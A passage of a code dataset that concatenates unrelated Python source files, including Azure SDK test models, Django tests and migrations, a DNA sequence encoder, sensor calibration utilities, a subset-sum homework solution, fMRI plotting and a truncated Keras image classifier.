kwargs.get('query_one', 30)\n\n\nclass ParameterGroupingPostMultiParamGroupsSecondParamGroup(Model):\n \"\"\"Additional parameters for post_multi_param_groups operation.\n\n :param header_two:\n :type header_two: str\n :param query_two: Query parameter with default. 
Default value: 30 .\n :type query_two: int\n \"\"\"\n\n _attribute_map = {\n 'header_two': {'key': '', 'type': 'str'},\n 'query_two': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostMultiParamGroupsSecondParamGroup, self).__init__(**kwargs)\n self.header_two = kwargs.get('header_two', None)\n self.query_two = kwargs.get('query_two', 30)\n\n\nclass ParameterGroupingPostOptionalParameters(Model):\n \"\"\"Additional parameters for post_optional operation.\n\n :param custom_header:\n :type custom_header: str\n :param query: Query parameter with default. Default value: 30 .\n :type query: int\n \"\"\"\n\n _attribute_map = {\n 'custom_header': {'key': '', 'type': 'str'},\n 'query': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostOptionalParameters, self).__init__(**kwargs)\n self.custom_header = kwargs.get('custom_header', None)\n self.query = kwargs.get('query', 30)\n\n\nclass ParameterGroupingPostRequiredParameters(Model):\n \"\"\"Additional parameters for post_required operation.\n\n All required parameters must be populated in order to send to Azure.\n\n :param body: Required.\n :type body: int\n :param custom_header:\n :type custom_header: str\n :param query: Query parameter with default. Default value: 30 .\n :type query: int\n :param path: Required. Path parameter\n :type path: str\n \"\"\"\n\n _validation = {\n 'body': {'required': True},\n 'path': {'required': True},\n }\n\n _attribute_map = {\n 'body': {'key': '', 'type': 'int'},\n 'custom_header': {'key': '', 'type': 'str'},\n 'query': {'key': '', 'type': 'int'},\n 'path': {'key': '', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostRequiredParameters, self).__init__(**kwargs)\n self.body = kwargs.get('body', None)\n self.custom_header = kwargs.get('custom_header', None)\n self.query = kwargs.get('query', 30)\n self.path = kwargs.get('path', None)\n","sub_path":"test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/_models.py","file_name":"_models.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327350700","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/eliotberriot/Seafile/kii/kii_main/kii/stream/tests/test_discussion.py\n# Compiled at: 2015-01-18 07:28:37\nfrom django.core.urlresolvers import reverse\nfrom actstream import models as actstream_models\nimport json\nfrom kii.discussion.models import AnonymousCommenterProfile\nfrom . import base\nfrom .. 
import models\n\nclass TestDiscussion(base.StreamTestCase):\n\n def test_can_attach_comments_to_stream_items(self):\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n c = models.ItemComment(subject=si, user=self.users[1], content='Hello world')\n c.save()\n self.assertEqual(si.comments.all().first(), c)\n\n def test_can_post_comment_as_logged_in_user(self):\n self.streams[0].assign_perm('read', self.anonymous_user)\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n url = si.reverse_comment_create()\n self.login(self.users[0].username)\n response = self.client.post(url, {'content': 'yolo'})\n self.assertEqual(si.comments.all().first().content.raw, 'yolo')\n\n def test_can_post_comment_as_anonymous_user(self):\n self.streams[0].assign_perm('read', self.anonymous_user)\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n url = si.reverse_comment_create()\n response = self.client.post(url, {'username': 'Edgar', 'email': 'contact@edgar.com', 'content': 'yolo'})\n comment = si.comments.all().first()\n self.assertEqual(comment.profile.username, 'Edgar')\n self.assertEqual(comment.profile.email, 'contact@edgar.com')\n\n def test_moderation_page_require_to_be_stream_owner(self):\n s = models.Stream.objects.get(title=self.users[0].username, owner=self.users[0])\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n response = self.client.get(url)\n self.assertRedirectsLogin(response, url)\n self.login(self.users[0].username)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n def test_moderation_return_awaiting_moderation_comments_by_default(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n si1 = self.G(models.StreamItem)\n profile = self.G(AnonymousCommenterProfile)\n c0 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n c1 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n c2 = self.G(models.ItemComment, subject=si1, user_profile=profile)\n c3 = self.G(models.ItemComment, subject=si1, user_profile=profile)\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n self.login(self.users[1].username)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertQuerysetEqualIterable(response.context['object_list'], [c1, c0])\n self.assertEqual(response.context['can_moderate'], True)\n\n def test_moderation_can_filter_by_status(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n si1 = self.G(models.StreamItem)\n profile = self.G(AnonymousCommenterProfile)\n c0 = self.G(models.ItemComment, subject=si0, user_profile=profile, status='junk')\n c1 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n self.login(self.users[1].username)\n response = self.client.get(url + '?status=junk')\n self.assertQuerysetEqualIterable(response.context['object_list'], [c0])\n\n def test_patch_comment_view_require_stream_owner(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c0 = self.G(models.ItemComment, subject=si0, user=self.users[0], content='Hello')\n url = 
reverse('kii:api:stream:itemcomment:update', kwargs={'pk': c0.pk})\n response = self.client.patch(url)\n self.assertEqual(response.status_code, 403)\n self.login(self.users[1].username)\n response = self.client.patch(url, json.dumps({'status': 'disapproved'}), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n c = models.ItemComment.objects.get(pk=c0.pk)\n self.assertEqual(c.status, 'disapproved')\n\n def test_addding_comment_send_notificatation_to_stream_owner(self):\n s = models.Stream.objects.get_user_stream(self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c = self.G(models.ItemComment, subject=si0, user=self.users[0])\n activity = actstream_models.user_stream(self.users[1])\n self.assertEqual(activity[0].action_object, c)\n self.assertEqual(activity[0].target, s)\n\n def test_each_comment_gets_an_absolute_url(self):\n s = models.Stream.objects.get_user_stream(self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c = self.G(models.ItemComment, subject=si0, user=self.users[0])\n self.assertEqual(c.get_absolute_url(), si0.get_absolute_url() + ('#comment-{0}').format(c.pk))","sub_path":"pycfiles/kii-0.8.tar/test_discussion.py","file_name":"test_discussion.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470251669","text":"import numpy as np\nimport os\nimport csv\nimport sys\nimport skbio\nimport pickle\nimport random\n\ndef read_fasta(fp):\n name, seq = None, []\n for line in fp:\n #remove first line from file\n line = line.rstrip()\n if line.startswith(\">\"):\n #create a string\n if name: yield (name, ''.join(seq))\n name, seq = line, []\n else:\n seq.append(line)\n if name: yield (name, ''.join(seq))\n\ndef vectorizeSequence(seq):\n # the order of the letters is not arbitrary.\n # Flip the matrix up-down and left-right for reverse compliment\n ltrdict = {'A':[1,0,0,0],'C':[0,1,0,0],'G':[0,0,1,0],'T':[0,0,0,1],\n 'a':[1,0,0,0],'c':[0,1,0,0],'g':[0,0,1,0],'t':[0,0,0,1]}\n return np.array([ltrdict[x] for x in seq])\n #return [[ltrdict[x] for x in seq]]\n#directory = os.getcwd()\n#directory = os.fsencode(directory1)\ndirectory = os.path.dirname(os.path.realpath(__file__))\ndata_directory = directory + \"/fna_files_two/\"\npickle_directory = directory + \"/pickle_files/\"\ndata_directory_encode = os.fsencode(data_directory)\ncounter = 0\ndataset = []\nlabels = []\nfor file in os.listdir(data_directory_encode):\n filename = os.fsdecode(file)\n if filename.endswith(\".fna\"):\n label = list(skbio.io.read(data_directory + filename,\n format = 'fasta'))[0].metadata['id']\n labels.append(label)\n data_filename = data_directory + filename\n with open(data_filename) as fp:\n for name, seq in read_fasta(fp):\n i = 0\n one_hot_seq = vectorizeSequence(seq)\n #length of the DNA sample\n seqLength = len(one_hot_seq)\n #list to store the 10000 150x4 training examples\n training_examples = []\n \n for i in range(0,10000):\n \n #generates 150 random integers to parse the DNA sample\n indices = np.random.randint(seqLength,size = 150)\n \n \t #a single 150x4 random example\n example = one_hot_seq[indices,:]\n tuple1 = (example, counter)\n #append each tuple of one bacteria(150x4) and it's label\n training_examples.append(tuple1)\n \n #create an array with 10K elements for 10K rows\n #training_examples = np.asarray(training_examples)\n \n counter +=1\n #print(training_examples)\n random_indices = np.random.randint(10000, size = 10000)\n for m in range(10000):\n 
dataset.append(training_examples[random_indices[m]])\n else:\n continue\nprint(dataset)\nfile1 = open(pickle_directory + 'dataset.pickle', 'wb')\npickle.dump(dataset,file1)\nfile1.close()\n\n","sub_path":"MetaGAN/Genomes/one_hot.py","file_name":"one_hot.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"243518150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('alert', '0004_auto_20170511_1502'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='message',\n options={'ordering': ['-pk']},\n ),\n migrations.AddField(\n model_name='subscriber',\n name='slack_username',\n field=models.CharField(max_length=100, null=True, blank=True),\n ),\n ]\n","sub_path":"alert/migrations/0005_auto_20170804_0723.py","file_name":"0005_auto_20170804_0723.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"614878538","text":"import numpy as np\nimport math\nimport xml.etree.ElementTree as ET\nfrom typing import List, Tuple\n\n\ndef getKnownCalibrationFormats() -> Tuple[List, List]:\n \"\"\"Return list of supported calibration formats and their extensions\n\n Returns\n -------\n extensions : List\n List of calibration file extensions\n formats : List\n List of calibration file formats \n \"\"\"\n calExt = [\"TXT\", \"TXT\", \"RSP\", \"RSPX\"]\n calFormats = [\"induction\", \"metronix\", \"rsp\", \"rspx\"]\n return calExt, calFormats\n\n\ndef getCalName(format, ext: str, sensor: str, serial: int, chopper) -> str:\n \"\"\"Get the calibration file name\n \n Parameters\n ----------\n format : str\n Calibration format\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n if format == \"induction\":\n return inductionName(ext, sensor, serial, chopper)\n elif format == \"metronix\":\n return metronixName(ext, sensor, serial, chopper)\n elif format == \"rsp\":\n return rspName(ext, sensor, serial, chopper)\n elif format == \"rspx\":\n return rspxName(ext, sensor, serial, chopper)\n else:\n return metronixName(ext, sensor, serial, chopper)\n\n\ndef inductionName(ext: str, sensor: str, serial: int, chopper: bool) -> str:\n \"\"\"Get internal format induction coil calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n return \"IC_{}.{}\".format(serial, ext)\n\n\ndef metronixName(ext: str, sensor: str, serial: int, chopper: bool) -> str:\n \"\"\"Get Metronix calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n if sensor == \"\" and not serial > 0:\n return None\n\n return \"{}{}.{}\".format(sensor, serial, ext)\n\n\ndef rspName(ext: str, sensor: str, serial: int, chopper: bool) -> List[str]:\n \"\"\"Get RSP calibration file name\n \n 
Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : List[str]\n Name of calibration files\n \"\"\"\n if len(sensor) < 5:\n # not possible to get a sensor number\n return None\n\n board = \"HF\"\n if chopper:\n board = \"LF\"\n # try to turn the sensor into an integer serial number\n try:\n sensorNum = int(sensor[3:])\n except:\n sensorNum = 0\n\n names = []\n names.append(\"TYPE-{:03d}_{}-ID-{:06d}.{}\".format(sensorNum, board, serial, ext))\n names.append(\"TYPE-{:03d}_BB-ID-{:06d}.{}\".format(sensorNum, serial, ext))\n return names\n\n\ndef rspxName(ext: str, sensor: str, serial: int, chopper: bool) -> List[str]:\n \"\"\"Get RSPX calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : List[str]\n Name of calibration files\n \"\"\"\n if len(sensor) < 6:\n # not possible to get a sensor number\n return None\n\n board = \"HF\"\n if chopper:\n board = \"LF\"\n sensorNum = int(sensor[3:5])\n names = []\n names.append(\"TYPE-{:03d}_{}-ID-{:06d}.{}\".format(sensorNum, board, serial, ext))\n names.append(\"TYPE-{:03d}_BB-ID-{:06d}.{}\".format(sensorNum, serial, ext))\n return names\n\n\ndef defaultCalibration():\n \"\"\"Default calibration data\n\n Returns\n -------\n data : np.ndarray\n Data lines converted to a float array\n staticGain : float\n Static gain \n \"\"\"\n return [1] * 10, 1\n","sub_path":"resistics/calibrate/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"166032570","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n'''\nAssignment 1: Birthday Present\n\nTeam Number: 2\nStudent Names: Amanda Forsman, Jessica Hillert\n'''\nimport unittest\n\ndef birthday_present(P, n, t):\n '''\n Sig: int[0..n-1], int, int --> Boolean\n Pre: n is the length of P and t is not a negative value\n Post: The returnvalue will be true if there is a match and otherwise false\n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present(P, len(P), 299) = True\n birthday_present(P, len(P), 11) = False\n '''\n # Initialize the dynamic programming matrix, A\n # Type: Boolean[0..n][0..t]\n # A = [[None for i in range(t + 1)] for j in range(n + 1)] ??\n out = []\n return_value = birthday_present_aux(P, n, t, P, out)\n return return_value\n\ndef birthday_present_aux(p, n, t, in_list, out_list):\n '''\n Sig: int[0..n-1], int, int --> Boolean\n Pre: n is the length of P and t is not a negative value\n Post: The returnvalue will be true if there is a match and otherwise false\n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_aux(P, len(P), P, [], 299) = True\n birthday_present_aux(P, len(P), P, [], 11) = False\n '''\n if t == 0:\n return True\n elif t > 0:\n i = 0\n x = len(in_list)\n while i < x:\n new_in = list(in_list)\n new_out = list(out_list)\n new_t = t - in_list[i]\n new_out.append(new_in[i])\n new_in.remove(new_in[i])\n return_value = birthday_present_aux(p, len(in_list), new_t, new_in, new_out)\n if return_value == True:\n return True\n else:\n i += 1\n if len(in_list) == 0:\n i = x\n return False\n\ndef birthday_present_subset(P, n, t):\n '''\n Sig: int[0..n-1], int, int --> int[0..m]\n Pre: 
n is the length of P and t is not a negative value\n Post: It will return a list whose sum of the elements in it is equal to t \n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_subset(P, len(P), 299) = [56, 7, 234, 2]\n birthday_present_subset(P, len(P), 11) = []\n '''\n out = []\n return_value = birthday_present_subset_aux(P, n, t, P, out)\n return return_value\n\ndef birthday_present_subset_aux(p, n, t, in_list, out_list):\n '''\n Sig: int[0..n-1], int, int --> int[0..m]\n Pre: n is the length of P and t is not a negative value\n Post: It will return a list whose sum of the elements in it is equal to t \n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_subset_aux(P, len(P), 299) = [56, 7, 234, 2]\n birthday_present_subset_aux(P, len(P), 11) = []\n '''\n if t == 0:\n return out_list\n elif t > 0:\n i = 0\n x = len(in_list)\n while i < x:\n new_in = list(in_list)\n new_out = list(out_list)\n new_t = t - in_list[i]\n new_out.append(new_in[i])\n new_in.remove(new_in[i])\n return_value = birthday_present_subset_aux(p, len(in_list), new_t, new_in, new_out)\n if len(return_value) > 0:\n return return_value\n else:\n i += 1\n if len(in_list) == 0:\n i = x\n return []\n\nclass BirthdayPresentTest(unittest.TestCase):\n \"\"\"Test Suite for birthday present problem\n \n Any method named \"test_something\" will be run when this file is \n executed. Use the sanity check as a template for adding your own \n tests if you wish. \n (You may delete this class from your submitted solution.)\n \"\"\"\n \n def test_sat_sanity(self):\n \"\"\"Sanity Test for birthday_present()\n \n This is a simple sanity check;\n passing is not a guarantee of correctness.\n \"\"\"\n P = [2, 32, 234, 35, 12332, 1, 7, 56]\n n = len(P)\n t = 11\n self.assertFalse(birthday_present(P, n, t))\n def test_sol_sanity(self):\n \"\"\"Sanity Test for birthday_present_subset()\n \n This is a simple sanity check;\n passing is not a guarantee of correctness.\n \"\"\"\n P = [2, 32, 234, 35, 12332, 1, 7, 56]\n n = len(P)\n t = 299\n self.assertTrue(birthday_present(P, n, t))\n self.assertItemsEqual(birthday_present_subset(P, n, t), \n [56, 7, 234, 2])\n\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"birthday_problem.py","file_name":"birthday_problem.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247917363","text":"import pickle\n#test\nfrom customobj import customobj_inh\nimport urllib\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\nimport yate\n\nimport sqlite3\n\ndb_name = 'cgi-bin/coachdata.sqlite'\n\ndef do_web_process():\n #test functions for yate.py\n print(yate.start_response())\n print(yate.start_response(\"text/plain\"))\n print(yate.start_response(\"application/json\"))\n print(yate.include_header(\"Test title for my web application in python test\"))\n print(yate.include_footer({'Home':'/index.html', 'Select':'/cgi-bin/select.py'}))\n print(yate.start_form(\"/cgi-bin/process-athlete.py\"))\n #print(urllib.request.urlopen('http://192.168.0.1/test.py', urllib.parse.urlencode({'a':'c'})))\n print(urllib.parse.urlencode({'a':'c'}))\n \n the_files = ['testdata/sarah2.txt', 'testdata/james2.txt', 'testdata/mikey2.txt']\n data = put_to_store(the_files)\n for each_data in data:\n print(data[each_data].name+' '+data[each_data].dob)\n data_copy = get_from_store()\n for each_data in data_copy:\n print(data_copy[each_data].name+' '+data_copy[each_data].dob)\n #start simple http 
server for test\n simple_http_server_test()\n pass\n\ndef simple_http_server_test():\n port = 8080\n\n httpd = HTTPServer(('', port), CGIHTTPRequestHandler)\n print(\"Starting simple_httpd on port: \" + str(httpd.server_port))\n httpd.serve_forever()\n\ndef process_files_obj(f_name):\n try:\n with open(f_name) as tFile:\n data = tFile.readline()\n tmp_list = data.strip().split(',')\n return(customobj_inh(tmp_list.pop(0), tmp_list.pop(0), tmp_list))\n except IOError as err:\n print('File error: '+str(err))\n return(None)\n\ndef put_to_store(files_list):\n all_referenses = {}\n \n for each_file in files_list:\n a_file = process_files_obj(each_file)\n all_referenses[a_file.name]=a_file\n try:\n with open('testdata/athletes.pickle', 'wb') as a_file_p:\n pickle.dump(all_referenses, a_file_p)\n except IOError as ioerr:\n print('File error(put_to_store): '+str(ioerr))\n \n return (all_referenses)\n pass\ndef get_from_store():\n all_referenses = {}\n try:\n with open('testdata/athletes.pickle', 'rb') as a_file_p:\n all_referenses = pickle.load(a_file_p)\n except IOError as ioerr:\n print('File error(get_from_store): '+str(ioerr))\n\n return (all_referenses)\n\ndef get_namesID_from_store():\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name, id FROM athletes\"\"\")\n response = results.fetchall()\n connection.close()\n return(response)\ndef get_athlete_from_id(athlete_id):\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name, dob FROM athletes WHERE id=?\"\"\",(athlete_id,))\n (name, dob) = results.fetchone()\n results = cursor.execute(\"\"\"SELECT value FROM timing_data WHERE athlete_id=?\"\"\",(athlete_id,))\n data = [row[0] for row in results.fetchall()]\n \n #Due to unknown order inside database, so we need sorted the data via customobj_inh class before display\n m_tmp_item = customobj_inh(name, dob, data)\n response = {'Name': m_tmp_item.name,\n 'DOB': m_tmp_item.dob,\n 'data': m_tmp_item.clean_data,\n 'top3': m_tmp_item.top3()}\n connection.close()\n return(response)\ndef get_name_from_store():\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name FROM athletes\"\"\")\n response = [row[0] for row in results.fetchall()]\n connection.close()\n return(response)\n'''\n m_item = get_from_store()\n list_trsult = [m_item[each_item].name for each_item in m_item]\n return(list_trsult)\n'''\n ","sub_path":"test/webprocess.py","file_name":"webprocess.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3797020","text":"from django.conf.urls import patterns, include, url\n\nfrom example.profiles.views import *\n\n\nurlpatterns = patterns('',\n url(r'^profile/(?P[a-z0-9-_]+).html$', AuthorDetailView.as_view(), name='author_detail'),\n url(r'^authors.html$', AuthorListView.as_view(), name='author_browse'),\n url(r'^account/users.html$', ProfileListView.as_view(), name='profile_list'),\n url(r'^account/user/create.html$', ProfileCreateView.as_view(), name='profile_create'),\n url(r'^account/user/(?P\\d+)/update.html$', ProfileUpdateView.as_view(), name='profile_update'),\n url(r'^account/user/(?P\\d+)/delete.html$', ProfileDeleteView.as_view(), name='profile_delete'),\n url(r'^account/settings_change.html$', ProfileSettingsUpdateView.as_view(), name='profile_settings'),\n url(r'^account/avatar_change.html$', 
AvatarChangeView.as_view(), name='avatar_change'),\n url(r'^render_primary/(?P[\\w\\d\\.\\-_]{3,30})/(?P[\\d]+)/$', 'render_primary', name='avatar_render_primary'),\n url(r'^list/(?P[\\+\\w\\@\\.]+)/$', 'avatar_gallery', name='avatar_gallery'),\n url(r'^list/(?P[\\+\\w\\@\\.]+)/(?P[\\d]+)/$', 'avatar', name='avatar'),\n)\n","sub_path":"example/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"25909076","text":"#overall plots\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport os\nimport sys\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction.image import grid_to_graph\nimport pandas as pd\nfrom scipy.stats import t as t_dist\n\nproject_path = \"../../\"\npath_to_data = project_path+\"data/ds009/\"\nlocation_of_images = project_path+\"images/\"\nlocation_of_functions = project_path+\"code/utils/functions/\" \nfinal_data = \"../data/\"\nbehav_suffix = \"/behav/task001_run001/behavdata.txt\"\nsmooth_data = final_data + 'smooth/'\nhrf_data = final_data + 'hrf/'\n\nsys.path.append(location_of_functions)\n\n# list of subjects\nsub_list = os.listdir(path_to_data)[1:]\n\n# Progress bar\ntoolbar_width=len(sub_list)\nsys.stdout.write(\"Clustering images: \")\nsys.stdout.write(\"[%s]\" % (\" \" * toolbar_width))\nsys.stdout.flush()\nsys.stdout.write(\"\\b\" * (toolbar_width+1))\n\nfrom tgrouping import t_grouping_neighbor\nfrom mask_phase_2_dimension_change import masking_reshape_start, masking_reshape_end, neighbor_smoothing, neighbor_smoothing_binary\nfrom Image_Visualizing import present_3d, make_mask\nfrom benjamini_hochberg import bh_procedure\n\n\n\n\nbh_all = np.load(\"../data/bh_t_beta/bh_all.npy\")\nt_all = np.load(\"../data/bh_t_beta/t_all.npy\")\nbeta_all = np.load(\"../data/bh_t_beta/beta_all.npy\")\n\n\nbh_all[bh_all!=1]=np.nan\nt_all[t_all!=1]=np.nan\nbeta_all[beta_all!=1]=np.nan\n\n\nfor i, name in enumerate(sub_list):\n\n\t# the mask for each subject\n\tpath_to_data = project_path + \"data/ds009/\" + name\n\tbrain = nib.load(path_to_data + '/anatomy/inplane001_brain.nii.gz')\n\tbrain=brain.get_data()\n\n\n\t# bh\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tupper= np.percentile(np.ravel(brain[::2,::2,:]),95)\n\tplt.colorbar()\n\t#plt.clim(0,upper)\n\toverlap=present_3d(bh_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output correct\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_bh_overlay.png\")\n\tplt.close()\n\n\n\t# t\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tplt.colorbar()\n\toverlap=present_3d(t_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output color correct\n\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_t_overlay.png\")\n\tplt.close()\n\n\n\n\t# beta\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tplt.colorbar()\n\toverlap=present_3d(beta_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output color 
correct\n\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_beta_overlay.png\")\n\tplt.close()\n\n\tsys.stdout.write(\"-\")\n\tsys.stdout.flush()\n\nsys.stdout.write(\"\\n\")\n\n\n","sub_path":"final/scripts/image_overlay_final.py","file_name":"image_overlay_final.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"35820061","text":"# neccesary libraries\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.applications.vgg16 import VGG16\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, Input\nfrom keras.layers import (Dense, Dropout,concatenate, Activation, Flatten, BatchNormalization, Conv2D, MaxPool2D, MaxPooling2D,Input,GlobalAveragePooling2D,\nGlobalMaxPooling2D,ZeroPadding2D,AveragePooling2D,Reshape,Convolution2D)\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import Callback, EarlyStopping, ReduceLROnPlateau, ModelCheckpoint, TensorBoard\nfrom keras.utils import layer_utils\nfrom keras.optimizers import SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils.vis_utils import plot_model\n\nfrom sklearn.utils import class_weight\nfrom sklearn import model_selection\n\nfrom glob import glob\nfrom shutil import copyfile\nimport pandas as pd\nfrom os import listdir\nimport fnmatch\nimport numpy as np\nimport random\nimport cv2\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom sklearn.utils import class_weight\nfrom PIL import Image\nfrom pandas import DataFrame\n\nfrom time import time\n\n# read data\ndata=pd.read_pickle(\"./balancedData_shuffled\")\n\n## get image data from dataframe\ndef procData(lower_ind, upper_ind):\n x = []\n y = []\n for ind in range(lower_ind, upper_ind):\n path = data['path'][ind]\n label = data['label'][ind]\n image = data['matrix'][ind]\n shape = image.shape\n if shape == (50,50,3):\n x.append(image)\n if label == '1':\n y.append(1)\n else:\n y.append(0)\n return x, y\n\n## Read images for debugging\nimport math\ntotal = data.shape[0]\ntest_part = math.ceil(total / 5)\ntrain_part = total - test_part\n\nX,Y = procData(0, train_part)\ntest_X, test_Y = procData(train_part, total)\n\nprint(\"idc(+) :\", Y.count(1))\nprint(\"idc(-) :\", Y.count(0))\nprint(\"Testing size :\", len(test_Y))\nprint(\"Training data shape :\", X[0].shape)\ndf = pd.DataFrame()\ndf[\"images\"]=X\ndf[\"labels\"]=Y\nX2 = df[\"images\"]\nY2 = df[\"labels\"]\nX = np.array(X)\nY = np.array(Y)\n\ntest_X = np.array(test_X)\ntest_Y = np.array(test_Y)\n\ntrain_X = X/255.0 # scale to [0,1]\ntest_X = test_X/255.0 # scale to [0,1]\n\ntrainHot_Y = to_categorical(Y, num_classes = 2)\ntestHot_Y = to_categorical(test_Y, num_classes = 2)\n\nprint(\"vgg16 executing \" )\ndef vgg_like(train_X, trainHot_Y, test_X, testHot_Y):\n \n input_shape = (50,50,3)\n model = Sequential()\n model.add(Conv2D(64, kernel_size=(3, 3),activation='relu',input_shape=input_shape,strides=2))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(128, (3, 3), activation='relu'))\n model.add(Conv2D(256, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.5))\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n \n 
